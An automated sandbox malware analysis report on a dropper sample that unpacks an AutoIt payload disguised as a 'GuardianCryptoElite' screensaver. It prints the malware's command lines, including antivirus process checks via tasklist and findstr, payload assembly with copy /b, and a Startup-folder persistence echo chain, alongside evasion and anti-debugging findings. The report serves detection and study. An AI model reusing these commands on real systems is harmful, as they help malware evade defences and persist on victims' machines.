Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: winrnr.dll	Jump to behavior

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: cW5i0RdQ4L.exe

Static file information: File size 1086602 > 1048576

Source: cW5i0RdQ4L.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E1CBDB push eax; retf	10_2_00E1CBF8
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E28B75 push ecx; ret	10_2_00E28B88
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00908B75 push ecx; ret	16_2_00908B88

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	File created: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\103495\Powder.pif			Jump to dropped file

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	File created: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\103495\Powder.pif			Jump to dropped file

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url

Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E859B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	10_2_00E859B3
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E15EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	10_2_00E15EDA
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_009659B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	16_2_009659B3
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_008F5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	16_2_008F5EDA

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E233B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

10_2_00E233B7

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found evasive API chain (date check)

Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	API coverage: 5.0 %
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	API coverage: 4.8 %

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E64005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_00E64005
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6494A GetFileAttributesW,FindFirstFileW,FindClose,	10_2_00E6494A
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E63CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_00E63CE2
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	10_2_00E6C2FF
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	10_2_00E6CD9F
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6CD14 FindFirstFileW,FindClose,	10_2_00E6CD14
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_00E6F5D8
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_00E6F735
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	10_2_00E6FA36
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00944005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	16_2_00944005
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094494A GetFileAttributesW,FindFirstFileW,FindClose,	16_2_0094494A
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	16_2_0094C2FF
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	16_2_0094CD9F
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094CD14 FindFirstFileW,FindClose,	16_2_0094CD14
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	16_2_0094F5D8
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	16_2_0094F735
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	16_2_0094FA36
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00943CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	16_2_00943CE2

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E15D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

10_2_00E15D13

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\103495\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\103495	Jump to behavior

Source: Powder.pif, 0000000A.00000002.3572166645.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, GuardianCryptoElite.scr, 00000010.00000002.3572129134.0000000003D10000.00000004.00000800.00020000.00000000.sdmp, GuardianCryptoElite.scr, 00000010.00000002.3572129134.0000000003D51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E745D5 BlockInput,

10_2_00E745D5

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E15240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

10_2_00E15240

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E35CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

10_2_00E35CAC

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E588CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

10_2_00E588CD

Enables debug privileges

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E2A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00E2A385
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E2A354 SetUnhandledExceptionFilter,	10_2_00E2A354
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0090A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_0090A385
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0090A354 SetUnhandledExceptionFilter,	16_2_0090A354

Contains functionality to execute programs as a different user

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E59369 LogonUserW,

10_2_00E59369

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E15240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

10_2_00E15240

Contains functionality to simulate keystroke presses

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E61AC6 SendInput,keybd_event,

10_2_00E61AC6

Contains functionality to simulate mouse events

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E651E2 mouse_event,

10_2_00E651E2

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Centres Centres.bat & Centres.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 103495	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "aroundaccommodategroupseverything" Fine	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Correct + ..\Transparent + ..\Barbie + ..\Gloves + ..\Latin + ..\Story + ..\Ski + ..\Appraisal n	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Powder.pif n	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr" "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\O"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardiancryptoelite.url" & echo url="c:\users\user\appdata\local\guardiancrypto systems inc\guardiancryptoelite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardiancryptoelite.url" & exit
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardiancryptoelite.url" & echo url="c:\users\user\appdata\local\guardiancrypto systems inc\guardiancryptoelite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardiancryptoelite.url" & exit			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

10_2_00E588CD

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E64F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

10_2_00E64F1C

Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.0000000002980000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmp, Powder.pif, 0000000A.00000003.1761264512.0000000004589000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Powder.pif, GuardianCryptoElite.scr	Binary or memory string: Shell_TrayWnd

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E2885B cpuid

10_2_00E2885B

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E40030 GetLocalTime,__swprintf,

10_2_00E40030

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E40722 GetUserNameW,

10_2_00E40722

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

